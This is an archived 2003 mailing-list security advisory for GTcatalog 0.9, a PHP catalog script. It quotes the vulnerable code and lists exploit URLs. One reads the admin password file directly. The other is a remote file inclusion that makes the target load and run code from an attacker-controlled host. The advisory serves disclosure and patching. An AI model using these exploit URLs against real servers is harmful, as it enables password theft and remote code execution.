[VulnWatch] GTcatalog (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/03/03

  • Next message: iDEFENSE Labs: "[VulnWatch] iDEFENSE Security Advisory 03.04.03: Locally Exploitable Buffer Overflow in file(1)"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Mon, 03 Mar 2003 15:52:29 +0100
    
    

    Informations :
    °°°°°°°°°°°°°°
    Version : 0.9
    Website : http://www.geektweaked.com
    Problem :
    - Informations Disclosure (Admin Password)
    - File Including

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    password.inc :
    <?
    $globalpw = "[PASSWORD]";
    ?>

    index.php :
    ------------------------------------------------------------------------
    [...]
    switch ($function)
    {

    case "custom":

    $cc = new Template();
            $cc->set_file("head",$dir_base.$dir_template."header.inc");
            $cc->set_var(array( 'clientcode' => $cfg_clientcode,
                                                                    'title' => $cfg_title." - ".$custom));
    $cc->parse("output","head");
    $cc->p("output");

    include($custom.".custom.inc");
    include ($dir_base.$dir_template."footer.inc");

    break;
    [...]
    ------------------------------------------------------------------------

    Exploits :
    °°°°°°°°°°
    - http://[target]/password.inc
    - http://[target]/index.php?function=custom&custom=http://[attacker]/1
    with :
    http://[attacker]/1.custom.inc

    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.info (-> New Version !! :))

    More Details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/GTcatalog.txt

    frog-m@n

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://messenger.fr.msn.be


  • Next message: iDEFENSE Labs: "[VulnWatch] iDEFENSE Security Advisory 03.04.03: Locally Exploitable Buffer Overflow in file(1)"

    Relevant Pages

    • GTcatalog (PHP)
      ... Website: http://www.geektweaked.com ... Informations Disclosure (Admin Password) ... switch ...
      (Bugtraq)
    • Re: Sniffing on a switch
      ... Subject: AW: Sniffing on a switch ... Audit your website security with Acunetix Web Vulnerability Scanner: ... Hackers are concentrating their efforts on attacking applications on your ... Up to 75% of cyber attacks are launched on shopping carts, forms, ...
      (Pen-Test)
    • Re: Sniffing on a switch
      ... > Now i know people say you "cant" sniff on a switch and I know about ARP ... > Audit your website security with Acunetix Web Vulnerability Scanner: ... Up to 75% of cyber attacks are launched on shopping carts, forms, ... Cross site scripting and other web attacks before hackers ...
      (Pen-Test)
    • RE: Sniffing on a switch
      ... > Subject: Sniffing on a switch ... > Audit your website security with Acunetix Web Vulnerability Scanner: ... > Hackers are concentrating their efforts on attacking applications on ... Up to 75% of cyber attacks are launched on shopping carts, ...
      (Pen-Test)
    • AW: Sniffing on a switch
      ... Now i know people say you "cant" sniff on a switch and I know about ARP ... Audit your website security with Acunetix Web Vulnerability Scanner: ... Cross site scripting and other web attacks before hackers do! ...
      (Pen-Test)